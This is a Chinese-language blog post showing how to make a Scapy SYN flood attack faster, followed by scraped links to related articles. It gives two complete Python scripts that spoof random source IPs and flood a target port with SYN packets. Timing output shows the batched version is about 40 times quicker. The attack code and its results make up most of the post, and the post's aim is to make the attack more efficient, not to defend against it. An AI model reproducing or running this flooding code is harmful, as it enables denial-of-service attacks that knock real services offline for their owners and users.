Scapy:快速syn洪水攻击(syn flood)
()写作不易,记得点个赞哦)
在一个send函数中同时发送多个syn包是提高syn洪水攻击效率的关键,下面将给出一个简单的例子。
常规的写法(使用for循环反复调用send函数发包):
#demo.py
#written by Matriller
from scapy.all import IP, TCP, send
from random import randint#用于计时,不是攻击中的必须组件
from time import timedef randip():'''返回随机的IPv4地址,用于伪造源地址'''return '.'.join( # IPv4地址的前三位范围为0到225,最后一位范围为1到225[str( randint(0, 255) ) for i in range(3)] + [str( randint(1, 255) )] )def attack(dst, dport, amount):'''进行syn洪水攻击的函数'''#构造syn包不是本文重点,先构造一个最简单的,且不做改变pkt = IP(src=randip(), dst=dst) / TCP(dport=dport) #发包部分#for循环发包for i in range(amount):send(pkt)if __name__=="__main__":amount = 1000start_time = time()attack("192.168.1.1", 80, amount)use_time = time() - start_timeprint(use_time, use_time/amount)
结果为:
┌──(matriller㉿Hack)-[~/桌面/Hack]
└─$ sudo python demo.py
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
(中间略)
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
34.551655292510986 0.03455165529251099
平均用时为:0.03455165529251099秒
改进后的写法(将包复制后用单个send函数发包):
#demo2.py
#written by Matriller
from scapy.all import IP, TCP, send
from random import randint#用于计时,不是攻击中的必须组件
from time import timedef randip():'''返回随机的IPv4地址,用于伪造源地址'''return '.'.join( # IPv4地址的前三位范围为0到225,最后一位范围为1到225[str( randint(0, 255) ) for i in range(3)] + [str( randint(1, 255) )] )def attack(dst, dport, amount):'''进行syn洪水攻击的函数'''#构造syn包不是本文重点,先构造一个最简单的,且不做改变pkt = IP(src=randip(), dst=dst) / TCP(dport=dport) #发包部分#将syn包复制amount份后传递给send函数send(pkt*amount)if __name__=="__main__":amount = 1000start_time = time()attack("192.168.1.1", 80, amount)use_time = time() - start_timeprint(use_time, use_time/amount)
结果为:
┌──(matriller㉿Hack)-[~/桌面/Hack]
└─$ sudo python demo2.py
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Sent 1000 packets.
0.8448374271392822 0.0008448374271392823
平均用时为:0.0008448374271392823秒
第一种写法平均发包时间来比第二种慢了0.033706817865371705秒,约是第二种的40.9倍;总用时慢了33.706817865371704,倍数同上。只能说没有对比就没有伤害
Scapy:快速syn洪水攻击(syn flood)相关推荐
- 对现有的所能找到的DDOS代码(攻击模块)做出一次分析----SYN(洪水攻击)篇
对现有的所能找到的DDOS代码(攻击模块)做出一次分析----SYN(洪水攻击)篇 //======================================================== ...
- Linux进行syn攻击的代码,Linux遭受SYN洪水攻击设置
SYN洪水攻击(SYN Flooding Attack)即是指利用了 TCP/IP 三次握手协议的不完善而 恶意发送大量仅仅包含 SYN 握手序列数据包的攻击方式.该种攻击方式可能将导致被攻击计算机为 ...
- 【网络编程】SYN Flood (SYN洪水攻击)原理及防阻
转载自: https://blog.csdn.net/jiange_zh/article/details/50446172 第一部分 SYN Flood的基本原理 一.原理 1.TCP握手协议 第一次 ...
- 巧用iptables五招免费搞定SYN洪水攻击
转载来源 :巧用iptables五招免费搞定SYN洪水攻击 :https://www.toutiao.com/i6772397997692027399/ 摘要: SYN Flood是种典型的DoS攻击 ...
- linux洪水攻击软件,SYN洪水攻击工具hping SYN-Flooding tool
这是SYN洪水攻击工具hping SYN-Flooding tool,是一個網路工具,可以用來測試firewall, 網路效能, 觀察遠端主機的回應狀態,包括TCP,UDP,ICMP. 软件介绍 前段 ...
- 什么是 SYN 洪水攻击?如何防护?
SYN 洪水(半开连接攻击)是一种拒绝服务 (DDoS) 攻击,旨在耗尽可用服务器资源,致使服务器无法传输合法流量.通过重复发送初始连接请求 (SYN) 数据包,攻击者将可击垮目标服务器计算机上的所有 ...
- SYN洪水攻击的原理,syn洪水攻击的解决办法
SYN洪水攻击的原理及解决办法分享 SYN洪水攻击的原理 遭到SYN攻击该如何防御呢? 1.修改等待数 2.启用syncookies 3.修改重试次数 4.限制单IP并发数 5.限制C类子网并发数 6 ...
- linux洪水攻击软件,Linux服务器下对SYN洪水攻击的诊断和阻挡
1.简介SYN Flood是当前最流行的DoS(拒绝服务攻击)与DDoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP连接请求,常用假冒的IP或IP号段发来海量的请 ...
- TCP三次握手之-awl工具-SYN洪水攻击
文章目录 云盾数据 TCP三次握手 TCP报文段的头部格式 实战-使用tcpdump 抓包 tcpdump 常用参数 tcpdmp 抓包 awl -syn-洪水攻击 原理 实战 总结: 云盾数据 - ...
最新文章
- HTML在表格右边增加一个表格,如何在表格右侧增加一列
- 【业务】现金贷获客之道业务流程分析
- 关于dismissViewControllerAnimated值得注意的一点(deinit)
- 线程同步,线程不同步_同步多线程集成测试
- 每日一题:leetcode191.位1的个数
- Silver Cow Party(POJ-3268)
- iphone已停用怎么解锁_iPhone 已停用怎么办?使用锁屏密码需要注意
- MySQL集群Cluster详解(一)——基本原理
- 华为服务器双系统教程,双系统安装教程
- 拼多多的砍价免费拿是真的吗?
- xyplorer的完美设置
- vijosP1285 佳佳的魔法药水
- 客户成功案例 | 从半导体到终端产品:恩智浦(NXP),利用数据驱动“移动”未来
- 2019上海网络赛icpc
- 学习笔记之English
- Boss直聘App上“天使投资、VC、PE” 与“A轮、B轮、C轮融资”的关系
- 分布式事务专题(三):分布式事务解决方案之2PC(两阶段提交)
- 优思学院|揭开六西格玛神秘的面纱
- HTML-Day-01
- 中国维护,维修和检查分销市场深度研究分析报告(2021)